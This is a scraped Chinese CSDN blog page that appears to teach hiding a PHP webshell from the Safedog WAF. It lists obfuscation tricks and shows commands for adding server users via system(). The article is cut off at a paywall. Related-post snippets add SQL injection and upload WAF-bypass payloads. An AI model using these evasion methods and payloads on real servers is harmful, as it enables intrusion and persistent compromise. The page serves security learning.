web攻防漏洞之Bypass安全狗绕过

最新推荐文章于 2025-04-02 20:14:17 发布
最新推荐文章于 2025-04-02 20:14:17 发布
阅读量1.2k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/s11show_163/article/details/104548569
版权
本文探讨了如何在目标网站安装了安全狗等应用防火墙时,通过利用PHP函数特性、eval->assert、字符串操作和动态执行等方式绕过安全检测,实现木马文件的挂载和执行,从而规避安全狗的查杀。文中提到了大小转换、文本颠倒、动态执行查杀等绕过方法,并给出了具体示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目的:攻击者在被害者网站上挂载一个自己的木马文件1.php,然后通过在攻击者电脑上访问该挂载文件来实现对被害者网站或者被害者电脑进行侵害。
攻击者希望执行:

创建服务器用户:
key=echo('<pre>');system('net user a a /add');
删除服务器用户:
key=echo('<pre>');system('net user a  /del');

那么在被害者网站服务器上安装有应用防火墙的情况下应该如何让木马文件不被检测删除呢?即怎么绕过安全检测软件如ByPass安全狗、云锁、D盾等。这里以安全狗为例进行绕过:

先概括一些绕过方式:
1.文本查杀绕过:
大小转换strtolower()
文本颠倒strrev()
文本分割
干扰函数echo/print_r/var_dump
加密
语言特征function/class
2.动态执行查杀绕过:
加密传输
改变传输特征

一、利用Php函数特性 + 大小转换 绕过:

1.php:

<?php
	$a = "eVal";
	$b = strtolower($a
最低0.47元/天 解锁文章
s11show_163
关注
WEB攻防-JAVAWEB项目常见漏洞
weixin_45534587的博客
05-31 1484
1.JavaWeb常见安全及代码逻辑2.目录遍历&身份验证&逻辑&JWT3.访问控制&安全组件&越权&三方组件本篇主要了解以上问题在javaweb中的呈现,第一个重点理解URL与javaweb代码框架的对应方式,java在没有代码的情况下是很难渗透的,下面的内容也是针对白盒的第二个重点是JWT身份验证/攻击。
第19天-WEB漏洞-SQL注入之SQLMAP绕过WAF
MCTSOG的博客
03-03 2031
攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF 层等,以便我们更灵活地去构造 Payload,从而可以和各种WAF 进行对抗,甚至绕过安全防御措施进行漏洞利用。 数据库特性(补充) %23x%0aunion%23x%0Aselect%201,2,3 %20/!44509union/%23x%0aselect%201,2,3 id=1/**&id=-1%20union%20select%201,2,3%23*/ %20union%20all%23%0a%20select%20
绕过安全狗Getshell
06-12
详细手把手教你如何绕过安全狗Getshell,新手一学就会
绕过安全狗_安全狗Bypass绕过
weixin_39604819的博客
01-11 1813
纸上得来终觉浅,绝知此事要躬行。安全狗的版本是4.0(最新的啦)在实战中会经常遇到waf很困扰,有时候站点有waf连报错都不会回显给你,这就很难受特此做一篇文章总结我学习绕狗的知识总结以安全狗为例,后续会出D盾、守护神等等有时间就做一些总结第一步确认已经打开安全狗,判断是否存在注入点由此可见安全狗对我们的不友好,按照拦截的思路,安全狗是拦截and 1=1一个整体的。如果你输入id?=1 ...
常见Linux Bypass技巧
最新发布
大河之犬的博客
04-02 681
推荐一个红队混淆框架:https://github.com/Bashfuscator/Bashfuscator。某些RCE接口限制了字符的长度,此时我们可以使用短字符 Bypass达到RCE的效果。IFS 是 shell 用来分隔字段的变量,默认是 空格、Tab 和换行符。执行whoami命令,如果第一个字符是s,则延迟5s。1、双重 Base64 编码隐藏反弹shell命令。取 HOME 变量的第一个字符,即。3、查看当前目录所有文件,但是。可以从环境变量获取字符,比如。5、利用未定义变量和。
安全狗绕过
alien0011的博客
06-09 3537
安全狗绕过(截至6.8号) 环境: phpstudy2018 安全狗apache版 sqllabs靶场 安全狗绕过思路: 安全狗是基于正则匹配的绕过,所以总是能够绕过其正则匹配实现sql的命令执行,需要对数据库语句灵活掌握。经过对安全狗的fuzz,测试其拦截规则,发现其实and、or这样的敏感字符是不会被直接拦截的,但是and加空格就会被拦截,其实绕过的中心可以向如何绕过空格偏移。 为了可以更清晰的认知注入语句是如何在数据库中执行的,我修改了sqli-lab的代...
安全狗绕过
weixin_30564901的博客
07-01 1026
3.5 加空格 换行 CoNtent-Disposition大小写或者空格或1 删除Content-Type: image/jpeg 删除form-data data前加空格 php后加:绕过 3.5文件名.php后面加#### form的m大写 ...
XSSBypass:XSS绕过技术
05-17
XSS绕过技术是安全研究人员和黑客为了测试或利用这些漏洞而发展出的一系列策略。 1. **理解XSS类型** - 存储型XSS:攻击者的脚本被存储在服务器上,然后在多个用户访问同一页面时触发。 - 反射型XSS:脚本通过URL...
WAF攻防实战笔记v1.0--Bypass.pdf
03-30
本笔记详细阐述了攻击者如何利用WAF防护中可能存在的漏洞和特性缺陷来实施绕过,展示了攻防双方在网络安全领域中持续的对抗和进步。读者应认识到,随着攻防技术的不断演变,WAF的部署与更新是保障Web应用安全不可或...
绕过安全狗
weixin_45923850的博客
07-20 1261
1. 判断类型:?id=1正常,?id=1 and 0被拦截,经过变形and和后面值发现这个组合会被拦截,用非常规方式绕过,例?id=1 and -1=-2和?id=1 and -1=-1,虽然绕过了,但是页面没变化,所以可能是字符型,加单引号就正常,?id=1' and -1=-1 --+ 2. 判断列数:输入?id=1' order by 3 --+被拦截,用注释,?id=1' /*!23144 order==*/ /*!32443 by*/ 3 --+页面正常,绕狗成功 3.
一次安全狗绕过
weixin_45490166的博客
07-15 328
http://115.159.97.35/sqli-labs-master/Less-1/?id=1 安全狗绕过 参考 https://www.cnblogs.com/Yang34/p/12055052.html ?id=1' order/*!99999asd*/by 3 --+ ?id=-1'union/*!99999test*/select 1,2,/*!99999test*/group_concat(schema_name) from information_schema.schemata--+
Fuzz安全狗注入绕过
p656456564545的专栏
01-03 834
  安全狗版本为: apache 4.0 网站为: php+mysql 系统: win 2003   这里只要是fuzz /*!union 跟 select*/ 之间的内容: 1 /*!union&lt;FUZZ_HERE&gt;select*/  位置很多可以选择。   脚本语言你可以用你喜欢的, 我这里用perl6   让我们一步步...
Safedog 4.0 bypass绕过
Keepb1ue的博客
02-28 4271
Safedog 4.0 bypass绕过
安全狗文件绕过
weixin_30241919的博客
08-24 514
上传绕过WAF的一些常用方法 0X01姿势总结 (1)fuzz文件名后缀方法用burpsuite进行模糊测试,寻找黑名单之外的文件(2)windows系统可以进行后缀修改如:webshell.php……………..(3)路径绕过:有些WAF只会监视某个目录是否被上传webshell(4)大小写组合如:PhP,pHp(5)filename换行(6)多个filename(7)引号绕过如:双...
waf绕过:网络安全狗绕过
m0_71332744的博客
08-07 1782
name='';//使用defun获取assert。
安全狗- bypass技巧
qq_45951598的博客
05-07 257
sql注入bypass 判断是否存在注入 payload ?id=2' and -ascii('a')=-abs('-97') --+ hhp参数污染 payload ?id=1' /*&id=1' order by 99 --+ */ 报错注入payload ?id=1' /*&id=-1'and(select extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.table
绕过安全狗优化
m0_62207482的博客
02-06 1216
8.2节中,我们已经完成模糊测试绕过安全狗脚本,其中仅仅对数字进行了模 糊处理,如此已经能够产生许多绕过安全狗的方法,如果需要更多的绕过安全狗 方法,可在此脚本的基础上进行修改,完善此脚本。在WAF应用程序进行防护的时候,一部分防护厂商会对某些user-agent进行特 殊放行,例如百度爬虫的user-agent。常见的绕过安全狗的方式有4种:利用string绕过、利用user-agent绕过、利用 MySQL语法和html的特殊性绕过、利用畸形数据包绕过。3.利用MySQL语法和HTML的特殊性绕过
绕过安全狗_绕过安全狗五步法
weixin_28810909的博客
12-24 739
今天分享绕过安全狗的方法,各位帽子兄弟研阅。PS:测试请断网,据说log会上传,哈哈熟悉的页面,没错绕过它,核心方法:Mysql注释绕过环境:001 利用数据回显获取用户信息找出回显字段http://127.0.0.1/killdog/dog.php?id=-1/*!50000union/*!50000/*!(select*/~1,2,3)http://127.0.0.1/killdog/dog...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值